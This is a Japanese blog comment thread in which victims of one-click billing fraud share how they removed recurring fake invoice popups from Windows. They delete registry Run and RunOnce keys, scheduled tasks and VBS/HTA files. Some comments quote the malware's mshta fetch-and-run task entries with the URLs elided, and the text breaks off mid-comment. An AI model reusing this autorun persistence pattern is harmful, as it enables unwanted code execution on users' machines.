5A54212Sを入れて探すとそのファイルを生成するファイルが見つかるかもしれません。

また、後から入れたソフトウェアですが、全部はチェックしていませんが、
一部はかえって害を起こすソフトウェアのようです。
ウィルスバスターの無料版のような信頼のおけるソフトウェアを試されましたか。
(追記）ウィルスバスターによる【駆除方法４】を追加しました。

[ 2011/08/07 17:30 ] [ 編集 ]

ありがとうございます。でも・・・

utprcや5A54212S、.htaをWindows7の右上にある検索ツールに入力しても出てこないのです。最初はそのやり方で見つけ出して駆逐したのですが・・・。
ところで、「一部はかえって害を起こすソフトウェアのようです」とのことですが、駆逐のために、あちらこちらを検索し、有料で導入しました。一体どんな害が考えられますか？

[ 2011/08/07 18:27 ] [ 編集 ]

Re: ありがとうございます。でも・・・

> utprcや5A54212S、.htaをWindows7の右上にある検索ツールに入力しても出てこないのです。最初はそのやり方で見つけ出して駆逐したのですが・・・。
windows7でファイル内の文字を検索する一つの方法として、整理→フォルダオプション→検索→ファイル名と内容を常に検索するにチェックを入れます。それから、右上の検索窓に5A54212Sなどを入れてCドライブを検索してみてください。（訂正しました。）
あと、復元は試されていないのですね？

> ところで、「一部はかえって害を起こすソフトウェアのようです」とのことですが、駆逐のために、あちらこちらを検索し、有料で導入しました。一体どんな害が考えられますか？
たとえば、一番上のソフトの2011をとった名前をgoogleで検索してみてください。もちろん、検索結果の情報が全て正しいとは限りませんから、自分が信用してもよいと思われるのなら、そのままに。反対に、これは良いソフトです、という情報も正しいとはかぎりません。私は、余程信頼のできるソフトでなければ入れないようにしています。

[ 2011/08/07 21:29 ] [ 編集 ]

復元を試行しましたが・・・

手順通り、復元を試行しましたが、復元ポイントの最古が2011/07/21となっており、断念せざるを得ませんでした。確か、７月の１４日か１５日に、なでしこジャパンのニュースをサイトで見ているとき、澤選手の写真をクリックしているうちに、あっという間にワンクリックの不正請求に引っかかってしまったのです。そこまでさかのぼるのは無理なようです。
残された方法として、ご教示いただいた、「windows7でファイル内の文字を検索する一つの方法として、ツール→フォルダオプション→検索→ファイル名と内容を常に検索するにチェックを入れます」を行いたいのですが、やり方が理解できません。詳しく教えていただければ幸いです。

[ 2011/08/08 00:56 ] [ 編集 ]

追記－何度もすみません

システムの復元を試行した後、今まで通り普通に起動すると、以下の表示のウィンドウが掲示されます。

sump.exe-ディスクがありません
× ドライブにディスクがありません。ディスクをドライブ\Device\Harddisk1\DR1に挿入して下さい。
＜キャンセル＞＜再実行＞＜続行＞

上記の意味するところを教えて下さい。どこをクリックしても消えず、しつこく立ち上がってきて、新たな悩みになっています。
あと、ウィルスバスター１６は以前からインストールしてあります。

[ 2011/08/08 01:14 ] [ 編集 ]

アイアイさん

すみません。ツールでなく整理でした。
windows7のある単語を含むファイルを探す別の方法はここにも出ています。
http://soudan1.biglobe.ne.jp/qa6927605.html

また、エラーメッセージは、●peedUpMyPCが原因のようですね。
googleでsump.exeと入れるといくつか解決法が出てきます。

(追記）ウィルスバスターで駆除する方法を記事に【駆除方法４】として掲載しました。

[ 2011/08/08 02:06 ] [ 編集 ]

引っかかったんだけどｗｗｗ

俺もこれに引っかかったけど元ファイルワードパッドで開いて遊べたから面白いｗｗｗｗ
詐欺ってこんなに馬鹿なんですかｗｗ？？
単純すぎますｗｗｗ
ジャバスクリプトでできてました。

[ 2011/08/09 14:59 ] [ 編集 ]

twitterで流れてきたURLからワンクリに引っかかってしまいました＞＜
まさかの初歩的ミス・・・
払わなくていいのはわかっていても、タスクで出るからほんとうざくて・・・

ちなみにスタートアップにもレジストリにもおらず、結局windows32\taskのところにありました。

これで一安心♪

[ 2011/08/31 17:29 ] [ 編集 ]

駆除方法２番を試したところ無制限にウィンドウが現れなくなりました。

しかし、その後も３つほどウィンドウが出てきていたのでHDD内を検索したところ、「ドキュメント」内に
（２番で削除したファイル名）.vbs
という名前のファイルがあり、それを削除することで完全に解決しました。

[ 2011/09/16 12:29 ] [ 編集 ]

皆さん、解決したようで良かったです。３つもウィンドウを出すなんて、ひどすぎますね。

[ 2011/09/16 13:14 ] [ 編集 ]

駆除できてほっとしました

スタート→ファイル名を指定して実行→msconfig.exeと入れて「スタートアップ」タグで見つかった身元不明のVBScriptファイルがあり、「チェックを外して無効」にしただけでは解決しませんでしたが、元のファイルを削除することにより解決できました。
復元やレジストリを触らずに済んでほっとしました。

[ 2011/09/18 10:05 ] [ 編集 ]

追加情報ありがとうございました(^ム^)

[ 2011/09/18 13:11 ] [ 編集 ]

bg.jpg

bg.jpgのファイルを移動したら、暫くして消えました。
エラーになったかも？

[ 2011/09/18 15:45 ] [ 編集 ]

駆除できました

自分のPCはWindows7です。

ご指摘のレジストリに登録ありました。
自分のPCの場合、実行ファイルはVBスクリプト（~.vbs）形式でした。
～\System32\Taskフォルダにタスクファイルもいましたので、タスクファイル、VBSファイル、レジストリをすべて消去しました。

※TaskファイルやVBSファイルをメモ帳で開いて、実行ファイルであることを確信しました。

[ 2011/10/01 01:19 ] [ 編集 ]

最近、主流（？）はvbsのようですね。ありがとうございました。

[ 2011/10/01 02:15 ] [ 編集 ]

助かりました<(_ _)>

ちょうどウィルスバスター2011をセキュリティソフトに使用していたので、
【駆除方法４】のリンクをたどりトレンドマイクロの対処方法にしたがって作業し、
どうやら駆除できた模様です。

ちなみに自分のPCはWindows7ですが、
「ドキュメント」フォルダに原因となるVBスクリプトファイルがありました。
最終的にはこいつを削除しまして、今のところ問題なさそうです(^^;

お恥ずかしい話でしたが、本当に助かりました!

[ 2011/10/02 02:11 ] [ 編集 ]

リンク先の記事はうまく機能したようですね。
ご報告ありがとうございました。

[ 2011/10/02 22:36 ] [ 編集 ]

請求画面は消えたのですが･･･

私もアダルトサイトの３クリック（“はい”“はい”“ＯＫ”）にて引っかかってしまい、入会請求画面が消えなくなりました。
その後、ファイル名を指定して実行→msconfig→スタートアップの見慣れない項目のチェックマークを外し、常駐を停止させたら消えたのですが、　まだプログラムはどこかに潜んでいる筈で、知識が無いため完全にクリーンにすることはできません。このまま放っておいても大丈夫なのでしょうか？

[ 2011/10/06 11:33 ] [ 編集 ]

再び、画面があらわれないようであれば、そのままでいいでしょう。
画面がまた現れるようであれば、他の駆除方法も参考にしてください。

[ 2011/10/06 20:03 ] [ 編集 ]

アドバイスありがとうございました。
パソコンに悪影響が出たりパフォーマンスが悪くなったりしないか心配だったので･･･。
それから、もう５日ほど出ていないのですが、また突然現れたりすることもあるのでしょうか？

[ 2011/10/07 11:07 ] [ 編集 ]

再起動しても出ず、1週間も出なければ、たいていは大丈夫でしょう。
（数分おきなどの短いサイクルが多い。）
万一、現れた場合には駆除方法２も参考にしてください。

[ 2011/10/09 14:16 ] [ 編集 ]

このサイトで助かりました

月桂樹葉様

はじめまして、こんばんは。
ワンクリック詐欺にはまってしまい、解決法をさがしていたところ、このサイトを見つけました。いろいろな削除方法の紹介と多くの方々の体験談があり、自分の症状やＰＣ（WinXP）の設定状況を確認してから、落ち着いて対処することできました。
大変ありがとうございました。m(_ _)m

私の場合は、レジストリの奥の方に「http://・・・」が書き込まれておりました。msconfigでスタートアップの設定だけで、問題のウィンドウを自動表示させないことができましたが、根本原因を排除するため、regeditで「http://・・・」を検索し、mshtaに関係するコードも含め削除（レジストリデータの削除）しました。
クリーナーなど使わずに済んだことが、何よりも良かったと思います。

他のＵＲＬからのリンクで、あっという間に不正なコードを仕込んでしまうという、なんと巧妙な手口なのでしょう。このサイトの情報が多くの人に広まり、このような詐欺が沈静化することを希望しますが、入口がアダルトサイトであることが、詐欺師の罠なのだと思います。

とにかく、ほっとしているところです。

[ 2011/10/12 02:11 ] [ 編集 ]

落ち着いて対処なさったのが良かった思います。
この種の手口は沈静化するどころかこの記事をUPした頃より増えているのが実情で残念です。

[ 2011/10/12 20:46 ] [ 編集 ]

ありがとうございました。

このページを拝見し、大変参考になりました。私の場合、中学生の息子かいたずらしたらしく、どこで何をしたのか解からず、困っていました。色々ためしてダメで、結局、立ち上げ時にE-NETケーブルを抜き、見に行くアドレスを表示させ、regeditで検索させ見つけました。URLや表示方法など変わっており、イタチごっこですね。レジストリを書き換えたプロセスが解からず、不安は残りますが、とりあえず良しとします。

[ 2011/10/13 02:51 ] [ 編集 ]

お父さん（お母さん？）大奮闘ですね。原因が？だということですがIPAの薦めている予防策
http://www.ipa.go.jp/security/topics/alert20080909.html#chap4
をご家族に徹底しましょう。フィルタリングソフトも入れるといいですね。
ＭＳのファミリーセーフティー（無料）というのもあります。

[ 2011/10/13 21:46 ] [ 編集 ]

与作さん　から以下のコメントをいただきました。
既出の通り、問題あるサイトへのリンクは編集させていただきますが、お許しください。
コメントありがとうございました。

> 私もとあるサイト(最下部にURL記載)で感染したのですが、ここに書かれている方法で解決できました。
>
> ありがとうございます。
>
> 私の場合はレジストリスタートアップ（HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun）に『mystify_88f7af90082eb78d54c0c8d7a9ed9ae8f789a01cb8da665e.vbs』という名前のファイルが登録されており、マイドキュメント内に同名の見知らぬVBSファイルが置かれていました。(システム構成では確認できませんでした。)
>
> 更に『C:WindowsSystem32Tasks』内に『mystify_88f7af90082eb78d54c0c8d7a9ed9ae8f789a01cb8da665e』と言うファイルが存在し、コレがタスクスケジュールで毎回呼ばれていたようです。
>
> 上記ファイル内ですが、見たところマイドキュメント内のVBSを実行するように書かれていました。
>
> ちなみに「mystify」とは『惑わす』といった意味合いの単語です。
> 思いっきり「私、惑わしてます」っていっていたので正直吹きましたけどｗ
>
> とにもかくにも、この情報が役に立てればと思います。
>
> 感染先URL⇒ttp://bluespound.***/
> 環境：Win7Pro(x64)
> ■不正プログラム構成
> ・レジストリ記述追加(スタートアップ)
> ・VBSファイル(マイドキュメント)
> ・定期実行ファイル(System32Tasks)

[ 2011/10/17 03:03 ] [ 編集 ]

mshtaの名前が変わってた

はじめまして
3分おきに出てくる嫌な画面の削除がうまくいかずに、ここにたどり着きました。
C\Windows\System32\Tasks にファイルがあるとの体験談が書かれてあり、
私の場合これで対応できて、大変参考になり解決しました。

あと、参考までに
私のタスクマネージャーの表示では、mshta という名前ではくMwgpn.exeと表示されておりました。
プロパティを見ると　元のファイル名が　mstha　と書かれてあり、名前が変わってるようです。

どうも有難うございましたm(_ _)m

[ 2011/10/21 06:56 ] [ 編集 ]

そういうこともあるのですね(@_@)　貴重な情報ありがとうございました。

[ 2011/10/23 02:22 ] [ 編集 ]

ryuk

Tasksのとこでanaway.....ってのを消したら直りました＞＜ありがとです＾＾

[ 2011/11/15 03:33 ] [ 編集 ]

どういたしましてです＾＾

[ 2011/11/17 22:05 ] [ 編集 ]

私もタスクの中でした。

私も、(>_<)さんと同じく、
C\Windows\System32\Tasksの中で
感染日のただの「ファイル」でしたが名前「Qicktime」だったので、だまされそうでした。

同じく、ファイルをメモ帳で開いたところ、htmlタグで

<Command>C:\Windows\system32\mshta</Command>
<Arguments>サイト名</Arguments>

がありました。
デスクトップに移動したら止まりました！

ありがとうございました！！

[ 2011/12/22 17:10 ] [ 編集 ]

QuickTimeを騙るとはフトドキな奴。
ご報告ありがとうございました。

[ 2011/12/23 13:44 ] [ 編集 ]

自分もこれは騙しだな？と思いながらもクリックしてしまいひどい目に遭いました・・・
色々試してみて　
C\Windows\System32\Tasks
の中の更新日時が限りなく近いものがあり、それをゴミ箱に移動させたところ「しばらくして」出てこなくなりました

まだ少し様子見ですが大丈夫だと思います。

しかし、mshta.exeは残ったままなのですが、どうしたら消せますかね？

OSはvistaです

長文失礼しました

[ 2012/01/06 03:11 ] [ 編集 ]

追記：会費請求画面にも表示されますが　登録(？)してしまった日時をメモしておくといいと思います。
それが手掛かりとなって今回は解決できたので。

[ 2012/01/06 03:22 ] [ 編集 ]

零さんへ

記事の【最後に】に理由が詳しく書いてありますが、mshta.exeは消さなくていいですよ。

[ 2012/01/06 05:01 ] [ 編集 ]

mshta.exe削除

レジストリエディタで、mshta.exe検索して
htaファイルを削除をするはずが、
mshta.exeを間違って削除してしまいました。
再起動しても復活していない気がするんですが、
どうしたらいいんでしょうか？
今、mshta.exeで検索すると
C:￥WINDOWS￥System32￥mshta...だけでます・・。

[ 2012/01/06 12:16 ] [ 編集 ]

削除する必要がなく再起動すると復活するのは
C:￥WINDOWS￥System32￥mshta.exeのことです。

[ 2012/01/07 00:51 ] [ 編集 ]

消せた!!

2年間家族の目に見えぬように隠してたけど
これで普通に再起動できる～！！

[ 2012/01/20 04:44 ] [ 編集 ]

>2年間家族の目に見えぬように隠してたけど

なんと涙ぐましい努力！

[ 2012/01/21 00:54 ] [ 編集 ]

家族兼用なので本当に助かりました。
丁寧な解説でとてもわかりやすかったです！
ありがとうございました！

[ 2012/02/04 03:37 ] [ 編集 ]

お役に立てて嬉しいです(〃∇〃v)♪

[ 2012/02/04 12:50 ] [ 編集 ]

解決いたしました＆質問

父がなにかやらかしたようで、mshtaポップアップ画面が消しても出てくるという事象が続いていました。

貴サイトを参考にし、プログラム、スタートアップ、レジストリで怪しい拡張子のものを探しましたが、mshta、hta、vps等のものはみつからず・・・

スタートアップのプログラムを一つ一つ確認することにしました。

すると、１つだけプログラムの場所がDocument and settings内にあるものがあり、確認したところ、mshtaを起動させるプログラムがありました。

該当ファイルを削除の上、スタートアップを無効にすることで解決いたしました。

レジストリからも削除したいのですが、レジストリが見つかりません。

msconfigのスタートアップの場所欄にはSOFTWARE\Microsoft～とあり、レジストリエディタにはSOFTWAREから始まるフォルダがありません。

どうやって消せますでしょうか？
（要するに、スタートアップの項目から削除したいということです）

[ 2012/04/10 00:27 ] [ 編集 ]

Re: 解決いたしました＆質問

お父上のために、がんばりましたね。
SOFTWARE\MicrosoftはレジストリエディタのHKEY_LOCAL_MACHINEの下にあります。

[ 2012/04/10 12:32 ] [ 編集 ]

Re:Re: 解決いたしました＆質問

返信ありがとうございます。

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft以下を探してみましたが、該当のレジストリはありませんでした。

msconfigのスタートアップ内の他のレジストリの場所はHKCUやHKLM内のSOFTWAREにあるようなのですが、該当のレジストリはSOFTWAREから始まる場所にあるようなのです。

スタートアップ内から該当の項目が消えればよいのですが、他に方法はございますでしょうか？

[ 2012/04/10 21:29 ] [ 編集 ]

りっくさん

HKEY_LOCAL_MACHINESOFTWAREMicrosoftSharedToolsMSConfigstartupreg
HKEY_LOCAL_MACHINESOFTWAREMicrosoftSharedToolsMSConfigstartupfolder
の中には、なかったということですね？

では、レジストリの中をプログラム名で検索してみてください。
検索の際、キー・値・データにチェックボックスがありますが、
データ以外のチェックボックスをはずしてみてください。
どうでしょうか？

[ 2012/04/10 23:00 ] [ 編集 ]

見つかりました！

親切にありがとうございます。

HKEY_LOCAL_MACHINESOFTWAREMicrosoftShared ToolsMSConfigstartupreg内にmsconfig内のスタートアップの「場所」と同一の「データ」が書かれているものが見つかりました。

スタートアップの「場所」名ならびにレジストリの「データ」名はSOFTWARE\Microsoft\Windows\CurrentVersion\Run
レジストリの「名前」は
keyでした。
そのレジストリを消したら、スタートアップからも消えました。

\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの中しか探していませんでした。

本当に、巧妙に隠しますね・・・

ありがとうございました！

[ 2012/04/12 23:00 ] [ 編集 ]

見つかって良かったですね

削除しなくても画面は出てこないと思いますが、
お気持ちがすっきりしたことでしょうヾ(@~▽~@)ノ

[ 2012/04/13 02:46 ] [ 編集 ]

未だに不正請求なんてしてる人がいたんですねぇ。
こちらのサイトのおかげで削除できました。月桂樹葉さん、りっくさん、ありがとうございました。すっきりしました＾＾

[ 2012/06/29 01:43 ] [ 編集 ]

不正請求は、まだまだあるみたいですね。
すっきりされて何よりですヽ(゜▽゜*)

[ 2012/06/29 14:17 ] [ 編集 ]

解決しました！？

エロムービーというサイトにやられました。
【駆除方法１】で、そのまんまの文字列を発見したのですが解決せず、【駆除方法２】で、SystemBootとRegWriteというファイル（作成日時と感染日時が一致）をフォルダから出したら請求画面が消えました。
丁寧に説明していただいて、どうもありがとうございました。
ところで、請求画面の問題は解決したのですが、他のウイルスに感染している可能性はありますか？
ウイルスセキュリティでは大丈夫なようですが・・・。
不躾な質問で申し訳ございませんが、回答よろしくお願いします。

[ 2012/07/04 19:01 ] [ 編集 ]

Re: 解決しました！？

新しい対処法のご報告ありがとうございました

セキュリティソフトでも100%とはいきませんが、
セキュリティソフトで完全スキャンすれば、
ほとんど大丈夫と考えてよいのではないのでしょうか。

[ 2012/07/04 19:36 ] [ 編集 ]

早い！！！

早速の回答、どうもありがとうございました。
しばらくは一抹の不安が残る思いますが、一安心しました。
今後は気を付けます・・・。

ところで、【駆除方法２】にあるタスクTabの確認ができませんでした（Vistaです）。今回は作成日時と感染日時が一致していたので気づきましたが。今後のためにも、確認方法を教えて下さい。

[ 2012/07/04 22:10 ] [ 編集 ]

わらび餅。さんへ

お返事は、仕事の都合によって、
早いときもあれば、全くできないときもありますので、悪しからず。

実は、当方はXPと７しか持っておらず、Vistaの場合は、検証できていません。
きっとVistaの方はわかりにくいところもあるでしょう。すみません。

Vistaの場合【駆除方法２】にあるタスクの確認は
http://windows.microsoft.com/ja-JP/windows-vista/Schedule-a-task
の記事がお役に立つのではないかと思います。
Windows７に近いのではないでしょうか。
家族がVistaを持っているのですが、なかなか使わせてくれません(　┰_┰)

[ 2012/07/04 22:33 ] [ 編集 ]

消えたあぁぁぁ！ｗ

ワンクリック詐欺に合いまして
どうやって消せるのか調べてたら

偶然このサイトを見かけて試してみました！
マイコンピューター\HKEY_USER\(各ユーザー)\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
↑
自分はこれで最後に.htaが付くものを発見し、それを削除して
再起動したらその後出なくなりました。
本当に助かりました
ありがとうございます！

[ 2012/07/19 17:39 ] [ 編集 ]

その方法で消えるワンクリック詐欺もまだまだあるのですね。
ご報告、ありがとうございました

[ 2012/07/21 17:37 ] [ 編集 ]

助けて〜〜〜

請求の画面は消えたんですが、再起動したらパソコンがおかしくなりました。インターネットに接続できなくなり困っています。。。

[ 2012/08/07 14:49 ] [ 編集 ]

Re: 助けて〜〜〜

情報が少ないのでいろいろな場合が考えられます。
プロバイダがOCNのようですので
電話サポート
０１２０－０４７－８６０
に相談するのが確実でしょう。
受付時間　10：00～19：00
（土日祝日含、年末年始は除きます）

[ 2012/08/07 17:52 ] [ 編集 ]

ワンクリック不正請求詐欺にひっかかりググった
ところここに辿りつきました。

PCに詳しくない私の場合下記に　
mshta.exe http://…最後に .htaがつかないキーを
見つけ削除するのですが、再起動するとまた会費請
求画面が現れハマッテました。
削除したはずのキーも再起動後に復活しているのです・・・。

\HKEY_CURRENT_USER\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run

悪さをしているﾌｧｲﾙがあるんだろうと思い　いろ＾２
探してみましたが見つかりません。

最終的に

Runと同じ階層のRunOnceが気になっていたので
中を確認するとmshta.exe http://…があり削除する
ことで会費請求画面があらわれなくなりました。

自動的に実行されるのはRunキーだけだと思い込んで
ました。

[ 2012/08/16 04:21 ] [ 編集 ]

新しい情報ありがとうございました。
ご丁寧に二段構えになっていたわけですね。
他の方のお役にも立つことと思います！

[ 2012/08/16 17:40 ] [ 編集 ]

タスクスケジューラー

私のＰＣ（Windowns7）もワンクリック詐欺にあい、対応策を探していてここに行き当たりました。
……ですが駆除方法１で、該当のものを削除してポップアップを消しても、
数分後にはまた現れてレジストリにも先ほど削除した定義が
書かれていました。（再起動しても同じ）

それ以降も探していたら、タスクスケジューラーにジョブが
登録されていて操作にmshta http://～　といった内容が
書かれていました。
そのジョブを削除したら以降でなくなりました。
登録内容をよく見ず削除したのですが、数分おきに起動するよう登録されていたようです。

上手く説明できず申し訳ありませんが、困った時にこのサイトが凄く助けになりましたので、
何か力になれたらと思い記載しました。

[ 2012/11/11 00:00 ] [ 編集 ]

Re: タスクスケジューラー

コメントありがとうございました。
お役に立てたということで、たいへん嬉しいです。

駆除方法２のwindows7のやり方で捜したら、そういう記述があったということでしょうか。
それとも、違う方法ですか。
同じ方法で捜したら、タスクスケジューラーにジョブが登録されていて
操作にmshta http://～　といった内容が書かれていたら、
それを削除すればいいという補足をしていただいたと解釈してよろしいでしょうか。

[ 2012/11/11 01:31 ] [ 編集 ]

Re: タスクスケジューラー

説明不足で申し訳ありません。
駆除方法２の記載を図解入りで書いてあるサイトが有り、
その方法から削除しました。

↓コチラの◆タスクスケジューラの削除手順です。
http://esupport.trendmicro.co.jp/pages/JP-2079467.aspx

手順が載っていて、確認ポイントが分かり易くて削除まで
至りました。

月桂樹葉さんのサイトで概念を勉強させていただいた
それをヒントに他のサイトを見ても意味合いが分かるようになり
削除方法を見つけることができました。
改めて、ありがとうございます。

相手も手口を変えてきているので、知っている情報を
公開していただける事は私の様な素人には助かります。

[ 2012/11/11 22:50 ] [ 編集 ]

Re: タスクスケジューラー

ごろさん

たいへんわかりやすい情報をありがとうございました。
トレンドマイクロ社にはこのサイトの情報を送ったこともあります。
たいへん、熱心に不正請求詐欺に取り組んでくれている会社だと思います。

早速、駆除方法２にその情報を加えたいと思います。
被害者の方の力になる情報をお知らせいただき、こちらこそありがとうございました。

[ 2012/11/13 20:28 ] [ 編集 ]

とても魅力的な記事でした！！
また遊びに来ます！！
ありがとうございます。。

[ 2012/12/25 15:23 ] [ 編集 ]

どうも～♪

[ 2012/12/26 23:19 ] [ 編集 ]

有難うございました

12月28日眠れぬまま深夜1時ｲﾝﾀｰﾈｯﾄを閲覧していてｱﾂﾞﾙﾄｻｲﾄに行き着き不用意にｸﾘｯｸしてしまい不当な料金請求の画面が現れ困ってしまいました。勿論料金を支払う気は全くありませんが画面を消しても10秒毎に画面が現れ削除方法を探しているとこのｻｲﾄを発見いたしました。駆除方法を色々ﾄﾗｲしてみましたが上手くゆきませんでした。といいますのもmshta.exeや.hta
やmsconfig.exe regedit.exeでPGMやファイルを検索しても該当するものは出てきませんでした。
最近のｱﾀﾞﾙﾄｻｲﾄは実に巧妙に実行ﾌｧｲﾙを忍び込ませているのですね。そこでやむなくｼｽﾃﾑの復元にトライしました。
IPAのWIN7の復元ﾏﾆｭｱﾙに従って復元したところｱﾀﾞﾙﾄの請求画面は消えました。どうしてもうまくゆかない時ﾄﾚﾝﾄﾞﾏｲｸﾛの有料ﾒﾝﾃを使わなければと思っていましたが復元処置で何とか対応できました。本当に有難うございました。今回の経験を生かして軽々にｸﾘｯｸすることはしないようにいたします。

[ 2012/12/29 21:30 ] [ 編集 ]

果敢にいろいろ挑戦する気力が、素晴らしいです！
安心して新しい年を迎えられますね

[ 2012/12/30 04:08 ] [ 編集 ]

大変助かりました

不注意でクリックしてしまったアダルトサイトで被害にあい、表示されないようにするための情報を探していました。
こちらのサイトを見つけ、早期対応する事が出来ました。

私の場合は、OSはWindows7で、駆除方法１のレジストリ削除方法と、駆除方法２のタスクスケジューラ削除を実行して対応できました。
レジストリでは、「mshta http://… php? …」タイプで登録されていました。
「mshta」でレジストリ内を検索したところ、いけさんがコメントしていた「RunOnce」の中にもあったので削除しました。

大変助かりました。ありがとうございます。

[ 2013/01/05 04:54 ] [ 編集 ]

記事のすみずみまで読んでいただけたのですね。
とても嬉しいです。
コメントありがとうございました。

[ 2013/01/06 02:22 ] [ 編集 ]

初めて見たサイトで見事にひっかかってしまい、ＳＥの旦那に相談するのも
こっ恥ずかしく、自分で対応する事に。

このブログがなければできませんでした。ありがとうございました。

駆除方法１の通り、レジストリ内の全てのＲunのmshta htaが含まれるものを

削除、スタートアップの再設定で元に戻りました！

本当にありがとうございました。結局、あまりに嬉しかったので旦那に報告してしまいました。

それにしても、巧妙な手口で感心してしまいました。

「利用規約」なるものが一見、背景のように薄く小さい文字でかすかに書かれていたらしいのですが・・

見えんわ！！

[ 2013/01/24 10:06 ] [ 編集 ]

かわいいガンバリ奥様ですね

コメントありがとうございました。

[ 2013/01/24 23:46 ] [ 編集 ]

はじめまして

こちらの情報を参考に
知人の依頼を何件も処理させていただいてます。

先のいけ様のコメントにありました

＞PCに詳しくない私の場合下記に　
mshta.exe http://…最後に .htaがつかないキーを
見つけ削除するのですが、再起動するとまた会費請
求画面が現れハマッテました。
削除したはずのキーも再起動後に復活しているのです・・・。

\HKEY_CURRENT_USER\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run

悪さをしているﾌｧｲﾙがあるんだろうと思い　いろ＾２
探してみましたが見つかりません。

最終的に

Runと同じ階層のRunOnceが気になっていたので
中を確認するとmshta.exe http://…があり削除する
ことで会費請求画面があらわれなくなりました。

＞

先日これと同様の症状がありました。
ただ今回処理したパターンでは再起動後また広告が復活してしまいました。
msconfigのスタートアップにおいてもチェックボックスが外してあるだけで値は残っていました。(チェックボックスを外して広告を消してもあらたに同じスタートアップが別名で勝手に作成されました)

そこでファイルのデータに記述のあったキーワード
php?を再度レジストリで検索をかけたところ
HKEY_LOCAL_MACHINESOFTWAREMicrosoftSharedToolsMSConfigstartupreg
の階層に
RegWritezn＊＊＊＊(英数の羅列)と
SystemBootzn＊＊＊＊(同じ英数)の二つのフォルダを発見しました。

\HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run
の場所では名前がRegWritezn＊＊＊＊とSystemBootzn＊＊＊＊の二種類出ていたのでコレだと思い削除(データの値は広告アドレスでした)

最終的に
①\HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run
②\HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\CurrentVersion\Runonce
③HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SharedTools\MSConfig\startupreg\RegWritezn
④HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SharedTools\MSConfig\startupreg\SystemBootzn

の合計４箇所にあったデータを削除しました。
大本がスタートアップだったのでRUNの場所でファイルを削除しても新しい値がまた入力されるというもののようです。

以上ご参考までに。

ありがとうございます。いつも助かってます。

[ 2013/02/02 14:54 ] [ 編集 ]

かんま様

詳細なご報告ありがとうございました。
良くつきとめてくださいました！！

初心者には歯が立たないとは思いますが、
よく読んで確信が持て、自己責任でできる上級者には役立つ情報になると思います。

詳しく、ていねいな情報を本当にありがとうございました。
複雑になってきて、削除するほうもたいへんです。
お知り合いの方の依頼を何件も処理されているということですが、
それだけ、皆さんに頼られている方なのですね。

すべてのウィルス対策ソフトで阻止できる方法があると良いですね。

[ 2013/02/03 00:35 ] [ 編集 ]

ダンプ法で解決

レジストリ、タスクスケジューラ、スタートアップの対応をしても解決せず、
こちらで書かれているダンプ法で解決しました。
windows7です。
ワンクリ詐欺ツールの本体は
C:\ProgramData\galan
にありました。
ありがとうございました。

[ 2013/06/20 03:01 ] [ 編集 ]

猛毒きのこさんの最終コメントに載っているやり方ですね！ご報告ありがとうございました。

[ 2013/06/20 03:47 ] [ 編集 ]

直りました♪ありがとうございます＾＾

レジストリ削除の時点で直りました。
わかりやすい説明ありがとうございます。

[ 2013/08/18 22:39 ] [ 編集 ]

素直な（？）請求画面でよかったですね

[ 2013/08/19 00:27 ] [ 編集 ]

上記「かんま」さんの手順で完了しました。
女房や子供にバレないように深夜にこのサイトを見つけ実行！
下の対策コメントを読まずに一番上にある初期の対策を一生懸命・・・何度やっても出てくるお化け。
翌日、下にある最近のコメントに気付き「かんま」さんの対策を見つけ実行！！
やっと成仏してくれました。

[ 2013/09/11 20:55 ] [ 編集 ]

深夜にがんばっているもっちパパが目に浮かびます。
かんまさんと同じ症状だったのですね。
ママやお子様にバレずにバンザーイ♪ヽ(゜▽゜*)ノ

[ 2013/09/11 22:00 ] [ 編集 ]

旦那さんが引っかかり、このサイトのおかげで何とか消すことが出来ました！ありがとうございましたm(__)m

[ 2014/02/02 16:38 ] [ 編集 ]

良い奥様ですね

[ 2014/02/03 04:01 ] [ 編集 ]

何度も何度も数時間かけて試行錯誤しても駄目で、なきそうだったけど、かんまさんの書き込みのとおりやったら直りました。

①\HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run
②\HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\CurrentVersion\Runonce
③HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SharedTools\MSConfig\startupreg\RegWritezn
④HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SharedTools\MSConfig\startupreg\SystemBootzn

この４箇所を上の本文にも載せたほうがいいと思います

それにしても非常に非常にひじょーに助かりました
ありがとうございます！！！

[ 2014/03/13 11:11 ] [ 編集 ]

Re: ありがとうございます

早速、本文に載せました。
ご指摘ありがとうございました！

[ 2014/03/15 03:33 ] [ 編集 ]

なんとかできました

上記の削除方法とは、起動すると自動的に立ち上がるようになっていたので、起動時に立ち上げるファイルを表示させて、怪しいものの中から見つけました。これを起動にスタートしなくなるようにこのメニューから削除するだけで、停止します。後は、ゆっくり犯人を特定すれば済みました。また、当日にダウンロードしたファイルからもフォルダーを特定することができました。インストール先は、XPですが、DOCUMENT and Setting>ALL Users>nxspmのフォルダーでした。nxspmというフォルダーの名前はふざけてますね。記憶ちがいかもしれまんがこの中に、70672703というファイルが起動ファイルだったのでしょうか。フォルダーの中に起動ファイルの他に、水着の女の写真のファイルやら時間を計測するファイルなどがありました。起動ファイルだけ削除すれば、止まるのですが、気分が悪いので、起動ファイルだけでなく、写真ファイル含めすべて削除しました。

[ 2014/03/27 18:27 ] [ 編集 ]

Re: なんとかできました

詳しい説明ありがとうございました。
全部消してスッキリですね

[ 2014/03/27 19:57 ] [ 編集 ]

＞nxspmというフォルダー

は、去年の話でしょうか？

キー名
HKEY_CURRENT_USER/Software/Webnxspm
値の名前(N): userid
値のデータ(V): 70672703

キー名
